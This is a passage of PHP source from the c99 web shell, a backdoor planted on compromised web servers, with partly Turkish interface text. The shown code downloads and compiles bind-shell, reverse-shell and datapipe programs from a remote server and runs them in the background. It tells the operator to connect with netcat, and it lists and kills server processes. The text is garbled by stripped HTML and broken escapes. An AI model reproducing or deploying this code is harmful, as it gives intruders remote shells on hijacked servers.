".(count($tab["folders"])+count($tab["links"]))." folders):
"; foreach($table as $row) { echo "rn"; foreach($row as $v) {echo "rn";} echo "rn"; } echo "

".$v."

---

   "; if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) { echo "                   "; } echo "sec:"; echo "sil"; echo "Degistir"; if ($usefsbuff) { echo "kes"; echo "kopyala"; echo "birak"; } echo " 

"; echo ""; } } if ($act == "tools") { $bndportsrcs = array( "c99sh_bindport.pl"=>array("Using PERL","perl %path %port"), "c99sh_bindport.c"=>array("Using C","%path %port %pass") ); $bcsrcs = array( "c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"), "c99sh_backconn.c"=>array("Using C","%path %host %port") ); $dpsrcs = array( "c99sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"), "c99sh_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost") ); if (!is_array($bind)) {$bind = array();} if (!is_array($bc)) {$bc = array();} if (!is_array($datapipe)) {$datapipe = array();} if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;} if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;} if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");} if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;} if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";} if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;} if (!empty($bindsubmit)) { echo "Result of binding port:
"; $v = $bndportsrcs[$bind["src"]]; if (empty($v)) {echo "Unknown file!
";} elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!
";} else { $w = explode(".",$bind["src"]); $ext = $w[count($w)-1]; unset($w[count($w)-1]); $srcpath = join(".",$w).".".rand(0,999).".".$ext; $binpath = $tmpdir.join(".",$w).rand(0,999); if ($ext == "pl") {$binpath = $srcpath;} @unlink($srcpath); $fp = fopen($srcpath,"ab+"); if (!$fp) {echo "Can't write sources to "".$srcpath.""!
";} elseif (!$data = c99getsource($bind["src"])) {echo "Can't download sources!";} else { fwrite($fp,$data,strlen($data)); fclose($fp); if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} $v[1] = str_replace("%path",$binpath,$v[1]); $v[1] = str_replace("%port",$bind["port"],$v[1]); $v[1] = str_replace("%pass",$bind["pass"],$v[1]); $v[1] = str_replace("//","/",$v[1]); $retbind = myshellexec($v[1]." > /dev/null &"); sleep(5); $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5); if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";} else {echo "Binding... ok! Connect to ".getenv("SERVER_ADDR").":".$bind["port"]."! You should use NetCat©, run "nc -v ".getenv("SERVER_ADDR")." ".$bind["port"].""!View binder's process";} } echo "
"; } } if (!empty($bcsubmit)) { echo "Result of back connection:
"; $v = $bcsrcs[$bc["src"]]; if (empty($v)) {echo "Unknown file!
";} else { $w = explode(".",$bc["src"]); $ext = $w[count($w)-1]; unset($w[count($w)-1]); $srcpath = join(".",$w).".".rand(0,999).".".$ext; $binpath = $tmpdir.join(".",$w).rand(0,999); if ($ext == "pl") {$binpath = $srcpath;} @unlink($srcpath); $fp = fopen($srcpath,"ab+"); if (!$fp) {echo "Can't write sources to "".$srcpath.""!
";} elseif (!$data = c99getsource($bc["src"])) {echo "Can't download sources!";} else { fwrite($fp,$data,strlen($data)); fclose($fp); if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} $v[1] = str_replace("%path",$binpath,$v[1]); $v[1] = str_replace("%host",$bc["host"],$v[1]); $v[1] = str_replace("%port",$bc["port"],$v[1]); $v[1] = str_replace("//","/",$v[1]); $retbind = myshellexec($v[1]." > /dev/null &"); echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...
"; } } } if (!empty($dpsubmit)) { echo "Result of datapipe-running:
"; $v = $dpsrcs[$datapipe["src"]]; if (empty($v)) {echo "Unknown file!
";} elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!
";} else { $srcpath = $tmpdir.$datapipe["src"]; $w = explode(".",$datapipe["src"]); $ext = $w[count($w)-1]; unset($w[count($w)-1]); $srcpath = join(".",$w).".".rand(0,999).".".$ext; $binpath = $tmpdir.join(".",$w).rand(0,999); if ($ext == "pl") {$binpath = $srcpath;} @unlink($srcpath); $fp = fopen($srcpath,"ab+"); if (!$fp) {echo "Can't write sources to "".$srcpath.""!
";} elseif (!$data = c99getsource($datapipe["src"])) {echo "Can't download sources!";} else { fwrite($fp,$data,strlen($data)); fclose($fp); if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]); $v[1] = str_replace("%path",$binpath,$v[1]); $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]); $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]); $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]); $v[1] = str_replace("//","/",$v[1]); $retbind = myshellexec($v[1]." > /dev/null &"); sleep(5); $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5); if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";} else {echo "Running datapipe... ok! Connect to ".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."! You should use NetCat©, run "nc -v ".getenv("SERVER_ADDR")." ".$bind["port"].""!View datapipe process";} } echo "
"; } } ?>port baglanti:

Port: "> parola: "> $v) {echo "".$v[0]."";} ?> 

baglantiya dön:

HOST: "> Port: "> $v) {echo "".$v[0]."";} ?> 

bakiniz sag tarafda ornek var. netcat;, calistir "nc -l -n -v -p "!

Veriyolu:

HOST: "> Local port: "> $v) {echo "".$v[0]."";} ?> 

Note: sources will be downloaded from remote server.Processes:
"; if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} else {$handler = "tasklist";} $ret = myshellexec($handler); if (!$ret) {echo "Girilemedi "".$handler.""!";} else { if (empty($processes_sort)) {$processes_sort = $sort_default;} $parsesort = parsesort($processes_sort); if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} $k = $parsesort[0]; if ($parsesort[1] != "a") {$y = "";} else {$y = "";} $ret = htmlspecialchars($ret); if (!$win) { if ($pid) { if (is_null($sig)) {$sig = 9;} echo "Sending signal ".$sig." to #".$pid."... "; if (posix_kill($pid,$sig)) {echo "OK.";} else {echo "ERROR.";} } while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} $stack = explode("n",$ret); $head = explode(" ",$stack[0]); unset($stack[0]); for($i=0;$i".$head[$i]."";} } $prcs = array(); foreach ($stack as $line) { if (!empty($line)) { echo "